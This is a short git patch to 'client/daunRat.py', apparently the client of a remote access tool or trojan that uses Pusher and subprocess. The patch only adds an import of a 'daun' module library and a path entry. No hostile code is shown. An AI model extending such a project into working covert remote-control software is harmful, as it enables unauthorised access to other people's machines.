From 56a8dfc3eef3b1dea08194b82b944359f6e3f293 Mon Sep 17 00:00:00 2001 From: BarsTiger Date: Fri, 29 Apr 2022 15:18:07 +0300 Subject: [PATCH] added using daun library --- client/daunRat.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/client/daunRat.py b/client/daunRat.py index 8e0adcf..8a66dd8 100644 --- a/client/daunRat.py +++ b/client/daunRat.py @@ -4,7 +4,9 @@ import pysher import io from contextlib import redirect_stdout import subprocess - +import daun.modules as daun # needed to use daun functionality from admin +import sys +sys.path.append('daun/modules') client_id = int()